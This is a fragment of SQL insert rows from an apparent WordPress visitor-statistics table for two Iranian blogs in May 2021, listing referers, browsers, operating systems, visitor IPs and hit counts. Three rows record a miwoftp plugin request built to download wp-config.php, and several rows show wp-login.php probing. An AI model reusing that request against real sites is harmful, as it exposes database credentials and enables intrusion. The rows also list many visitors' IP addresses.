(11462,'2021-05-10','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','218.77.209.232','000',0,1,0),
(11463,'2021-05-10','http://82.102.9.14:80/blog','Unknown','Android','10',NULL,NULL,'','121.5.109.55','000',0,1,0),
(11464,'2021-05-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','91.92.185.70','000',0,1,0),
(11465,'2021-05-10','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','52.52.190.187','000',0,6,0),
(11466,'2021-05-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.206.247','000',0,1,0),
(11467,'2021-05-10','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','52.65.15.196','000',0,6,0),
(11468,'2021-05-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','80.94.93.24','000',0,1,0),
(11469,'2021-05-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.181','000',0,3,0),
(11470,'2021-05-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','192.53.170.243','000',0,1,0),
(11471,'2021-05-10','https://cn.bing.com/','Chrome','Linux','Unknown',NULL,NULL,'','123.115.133.176','000',0,1,0),
(11472,'2021-05-10','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.239.224.143','000',0,1,0),
(11473,'2021-05-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.46.254.25','000',0,1,0),
(11474,'2021-05-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(11475,'2021-05-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(11476,'2021-05-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.54.51','000',0,1,0),
(11477,'2021-05-10','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.16','000',0,1,0),
(11478,'2021-05-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,1,0),
(11479,'2021-05-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(11480,'2021-05-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(11481,'2021-05-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(11482,'2021-05-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(11483,'2021-05-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(11484,'2021-05-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.119.5','000',0,1,0),
(11485,'2021-05-10','http://ictbank.ir/blog','Safari','iOS','12.4.8',NULL,NULL,'','208.100.26.230','000',0,1,0),
(11486,'2021-05-10','http://mail.design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','37.238.45.43','000',0,2,0),
(11487,'2021-05-11','http://ictbank.ir/blog','Chrome','Android','8.0.0',NULL,NULL,'','159.89.18.82','000',0,2,0),
(11488,'2021-05-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(11489,'2021-05-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','206.189.117.9','000',0,1,0),
(11490,'2021-05-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(11491,'2021-05-11','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','218.77.209.232','000',0,2,0),
(11492,'2021-05-11','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(11493,'2021-05-11','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','23.100.232.233','000',0,1,0),
(11494,'2021-05-11','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','201.219.236.231','000',0,2,0),
(11495,'2021-05-11','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.26','000',0,21,0),
(11496,'2021-05-11','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','36.106.166.182','000',0,1,0),
(11497,'2021-05-11','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','167.114.17.113','000',0,2,0),
(11498,'2021-05-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.181','000',0,3,0),
(11499,'2021-05-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.116.238','000',0,1,0),
(11500,'2021-05-11','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','121.5.145.96','000',0,1,0),
(11501,'2021-05-11','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','116.110.102.45','000',0,2,0),
(11502,'2021-05-11','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.26.68','000',0,1,0),
(11503,'2021-05-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.158.166.131','000',0,2,0),
(11504,'2021-05-11','http://82.102.9.14/blog','Chrome','OS X','10.14.6',NULL,NULL,'','54.83.179.69','000',0,1,0),
(11505,'2021-05-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.172.122','000',0,1,0),
(11506,'2021-05-11','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','79.127.96.129','000',0,1,0),
(11507,'2021-05-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.72.158','000',0,1,0),
(11508,'2021-05-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.118.7','000',0,1,0),
(11509,'2021-05-11','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','142.93.4.120','000',0,15,0),
(11510,'2021-05-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','204.12.242.186','000',0,2,0),
(11511,'2021-05-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,1,0),
(11512,'2021-05-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.111.39','000',0,1,0),
(11513,'2021-05-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(11514,'2021-05-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(11515,'2021-05-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11516,'2021-05-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11517,'2021-05-11','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','124.66.189.214','000',0,1,0),
(11518,'2021-05-11','http://mail.design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','86.98.204.253','000',0,2,0),
(11519,'2021-05-11','http://ictbank.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','168.228.19.6','000',0,2,0),
(11520,'2021-05-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.181','000',0,3,0),
(11521,'2021-05-12','http://ictbank.ir/','Chrome','Windows','6.3',NULL,NULL,'','116.252.173.103','000',0,1,0),
(11522,'2021-05-12','https://www.google.com/','Safari','OS X','10.15.7',NULL,NULL,'','188.143.175.150','000',0,1,0),
(11523,'2021-05-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','106.14.169.224','000',0,1,0),
(11524,'2021-05-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.8.145','000',0,1,0),
(11525,'2021-05-12','https://cn.bing.com/','Chrome','Linux','Unknown',NULL,NULL,'','221.220.168.165','000',0,2,0),
(11526,'2021-05-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','69.12.66.211','000',0,2,0),
(11527,'2021-05-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(11528,'2021-05-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','108.62.124.89','000',0,1,0),
(11529,'2021-05-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.222.181','000',0,1,0),
(11530,'2021-05-12','https://metager.org/','Chrome','Android','9',NULL,NULL,'','46.8.42.159','000',0,1,0),
(11531,'2021-05-12','http://ictbank.ir/blog','Firefox','Windows','6.0',NULL,NULL,'','193.46.254.25','000',0,1,0),
(11532,'2021-05-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','174.138.18.208','000',0,1,0),
(11533,'2021-05-12','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','142.11.240.186','000',0,2,0),
(11534,'2021-05-12','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,1,0),
(11535,'2021-05-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,2,0),
(11536,'2021-05-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11537,'2021-05-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(11538,'2021-05-12','http://mail.design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','177.8.0.98','000',0,2,0),
(11539,'2021-05-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.114.100.197','000',0,1,0),
(11540,'2021-05-12','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','51.77.52.160','000',0,1,0),
(11541,'2021-05-12','https://www.google.com/search?','Internet Explorer','Windows','6.1',NULL,NULL,'','192.151.158.244','000',0,42,0),
(11542,'2021-05-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.119.5','000',0,1,0),
(11543,'2021-05-13','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(11544,'2021-05-13','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','223.166.74.236','000',0,1,0),
(11545,'2021-05-13','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,1,0),
(11546,'2021-05-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.12.107.10','000',0,1,0),
(11547,'2021-05-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.114.100.197','000',0,1,0),
(11548,'2021-05-13','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','103.207.8.128','000',0,2,0),
(11549,'2021-05-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','77.222.115.146','000',0,3,0),
(11550,'2021-05-13','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','5.8.16.84','000',0,2,0),
(11551,'2021-05-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.204.147','000',0,1,0),
(11552,'2021-05-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.199.208.8','000',0,1,0),
(11553,'2021-05-13','http://ictbank.ir/blog','Chrome','FreeBSD','',NULL,NULL,'','104.144.31.46','000',0,1,0),
(11554,'2021-05-13','http://ictbank.ir/blog','Chrome','OS X','10.6.4',NULL,NULL,'','23.250.24.46','000',0,1,0),
(11555,'2021-05-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.181','000',0,3,0),
(11556,'2021-05-13','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.122','000',0,2,0),
(11557,'2021-05-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.68.73.4','000',0,1,0),
(11558,'2021-05-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','91.79.37.152','000',0,4,0),
(11559,'2021-05-13','https://duckduckgo.com/','Safari','OS X','10.15.6',NULL,NULL,'','188.115.58.80','000',0,1,0),
(11560,'2021-05-13','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.108','000',0,2,0),
(11561,'2021-05-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(11562,'2021-05-13','http://ictbank.ir/blog/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes','Unknown','Windows','10.0',NULL,NULL,'','51.38.83.105','000',0,1,0),
(11563,'2021-05-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(11564,'2021-05-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(11565,'2021-05-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(11566,'2021-05-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(11567,'2021-05-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.165.190.34','000',0,1,0),
(11568,'2021-05-13','http://mail.design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','187.190.211.17','000',0,2,0),
(11569,'2021-05-13','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','Chrome','Windows','10.0',NULL,NULL,'','188.214.106.69','000',0,2,0),
(11570,'2021-05-14','https://www.google.com','Chrome','Windows','10.0',NULL,NULL,'','167.114.172.180','000',0,102,0),
(11571,'2021-05-14','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','190.43.228.208','000',0,2,0),
(11572,'2021-05-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.181','000',0,6,0),
(11573,'2021-05-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.118.77.10','000',0,2,0),
(11574,'2021-05-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,1,0),
(11575,'2021-05-14','https://google.com','Chrome','Linux','Unknown',NULL,NULL,'','89.248.168.138','000',0,2,0),
(11576,'2021-05-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.210.171','000',0,1,0),
(11577,'2021-05-14','https://cn.bing.com/','Firefox','Fedora','Unknown',NULL,NULL,'','112.43.44.119','000',0,1,0),
(11578,'2021-05-14','http://design-arena.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.65.205.10','000',0,1,0),
(11579,'2021-05-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','120.237.152.78','000',0,1,0),
(11580,'2021-05-14','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.122','000',0,3,0),
(11581,'2021-05-14','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','139.155.18.139','000',0,3,0),
(11582,'2021-05-14','http://www.google.com/','Chrome','Android','10',NULL,NULL,'','39.43.121.42','000',0,1,0),
(11583,'2021-05-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.41.245.247','000',0,1,0),
(11584,'2021-05-14','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','188.214.106.69','000',0,1,0),
(11585,'2021-05-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(11586,'2021-05-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,1,0),
(11587,'2021-05-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,2,0),
(11588,'2021-05-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(11589,'2021-05-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(11590,'2021-05-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','190.2.131.201','000',0,3,0),
(11591,'2021-05-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.8.164.233','000',0,1,0),
(11592,'2021-05-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','158.69.52.114','000',0,1,0),
(11593,'2021-05-15','http://www.ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.136','000',0,4,0),
(11594,'2021-05-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','179.60.150.42','000',0,1,0),
(11595,'2021-05-15','http://mail.design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','14.162.39.31','000',0,2,0),
(11596,'2021-05-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,1,0),
(11597,'2021-05-15','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.189.140.8','000',0,4,0),
(11598,'2021-05-15','http://ictbank.ir/blog','Chrome','OpenBSD','',NULL,NULL,'','52.65.15.196','000',0,6,0),
(11599,'2021-05-15','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','3.0.115.255','000',0,6,0),
(11600,'2021-05-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(11601,'2021-05-15','http://design-arena.ir/blog/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes','Unknown','Windows','10.0',NULL,NULL,'','51.38.83.105','000',0,1,0),
(11602,'2021-05-15','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.175','000',0,1,0),
(11603,'2021-05-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.40.113.31','000',0,1,0),
(11604,'2021-05-15','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','132.248.170.14','000',0,2,0),
(11605,'2021-05-15','http://ictbank.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','103.123.151.118','000',0,2,0),
(11606,'2021-05-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.35.140','000',0,1,0),
(11607,'2021-05-15','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.239.66.121','000',0,1,0),
(11608,'2021-05-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.94.230.236','000',0,2,0),
(11609,'2021-05-15','https://duckduckgo.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','151.247.173.244','000',0,1,0),
(11610,'2021-05-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.137.73.51','000',0,4,0),
(11611,'2021-05-15','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','31.58.160.150','000',0,2,0),
(11612,'2021-05-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.12.25','000',0,1,0),
(11613,'2021-05-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.181','000',0,3,0),
(11614,'2021-05-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.12.107.10','000',0,1,0),
(11615,'2021-05-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(11616,'2021-05-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,2,0),
(11617,'2021-05-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11618,'2021-05-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(11619,'2021-05-15','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','91.76.162.44','000',0,1,0),
(11620,'2021-05-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','77.222.115.146','000',0,2,0),
(11621,'2021-05-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.30.100','000',0,1,0),
(11622,'2021-05-16','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','192.210.201.145','000',0,8,0),
(11623,'2021-05-16','http://design-arena.ir/blog','Unknown','Android','10',NULL,NULL,'','42.192.17.155','000',0,1,0),
(11624,'2021-05-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.181','000',0,3,0),
(11625,'2021-05-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.95.117','000',0,1,0),
(11626,'2021-05-16','http://design-arena.ir/blog/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes','Unknown','Windows','10.0',NULL,NULL,'','51.38.83.105','000',0,1,0),
(11627,'2021-05-16','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','44.192.76.169','000',0,1,0),
(11628,'2021-05-16','http://ictbank.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','152.57.231.105','000',0,2,0),
(11629,'2021-05-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.165.78','000',0,1,0),
(11630,'2021-05-16','http://ictbank.ir/blog/','Internet Explorer','Windows','5.2',NULL,NULL,'','109.252.111.209','000',0,1,0),
(11631,'2021-05-16','http://mail.design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','113.160.96.5','000',0,2,0),
(11632,'2021-05-16','http://mail.design-arena.ir/blog','Baidu Browser','Android','9',NULL,NULL,'','27.211.180.110','000',0,1,0),
(11633,'2021-05-16','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.3',NULL,NULL,'','92.204.174.134','000',0,2,0),
(11634,'2021-05-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(11635,'2021-05-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11636,'2021-05-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,2,0),
(11637,'2021-05-16','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','181.167.32.83','000',0,1,0),
(11638,'2021-05-16','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(11639,'2021-05-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.106.30.100','000',0,1,0),
(11640,'2021-05-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.181','000',0,6,0),
(11641,'2021-05-17','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','136.232.238.242','000',0,2,0),
(11642,'2021-05-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(11643,'2021-05-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.212.192.59','000',0,1,0),
(11644,'2021-05-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.148.50.213','000',0,1,0),
(11645,'2021-05-17','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','45.140.170.187','000',0,1,0),
(11646,'2021-05-17','http://ictbank.ir/blog','Chrome','Windows','4.0',NULL,NULL,'','185.220.101.4','000',0,2,0),
(11647,'2021-05-17','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','198.144.120.234','000',0,1,0),
(11648,'2021-05-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','18.27.197.252','000',0,2,0),
(11649,'2021-05-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','104.244.75.80','000',0,3,0),
(11650,'2021-05-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.82.216.14','000',0,12,0),
(11651,'2021-05-17','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','185.220.102.241','000',0,2,0),
(11652,'2021-05-17','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','185.220.103.9','000',0,1,0),
(11653,'2021-05-17','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','62.102.148.69','000',0,3,0),
(11654,'2021-05-17','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','185.220.100.253','000',0,1,0),
(11655,'2021-05-17','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','163.172.29.30','000',0,2,0),
(11656,'2021-05-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(11657,'2021-05-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(11658,'2021-05-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(11659,'2021-05-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11660,'2021-05-17','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','102.128.141.154','000',0,9,0),
(11661,'2021-05-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,1,0),
(11662,'2021-05-17','http://mail.design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','171.100.250.246','000',0,2,0),
(11663,'2021-05-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','77.222.115.146','000',0,3,0),
(11664,'2021-05-18','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','193.189.100.205','000',0,3,0),
(11665,'2021-05-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.56.80.65','000',0,1,0),
(11666,'2021-05-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','89.163.249.244','000',0,2,0),
(11667,'2021-05-18','http://ictbank.ir/blog','Chrome','OpenBSD','',NULL,NULL,'','45.144.225.119','000',0,3,0),
(11668,'2021-05-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.82.216.14','000',0,6,0),
(11669,'2021-05-18','http://design-arena.ir/blog/','Opera','Windows','10.0',NULL,NULL,'','54.39.29.64','000',0,1,0),
(11670,'2021-05-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(11671,'2021-05-18','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','165.225.120.238','000',0,3,0),
(11672,'2021-05-18','https://www.ecosia.org/','Firefox','Windows','10.0',NULL,NULL,'','109.192.73.107','000',0,4,0),
(11673,'2021-05-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.207.32','000',0,1,0),
(11674,'2021-05-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','80.94.93.212','000',0,1,0),
(11675,'2021-05-18','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(11676,'2021-05-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.12.71.108','000',0,1,0),
(11677,'2021-05-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.150.121','000',0,1,0),
(11678,'2021-05-18','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','87.95.53.54','000',0,1,0),
(11679,'2021-05-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','54.242.75.178','000',0,2,0),
(11680,'2021-05-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','121.89.236.242','000',0,1,0),
(11681,'2021-05-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(11682,'2021-05-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(11683,'2021-05-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
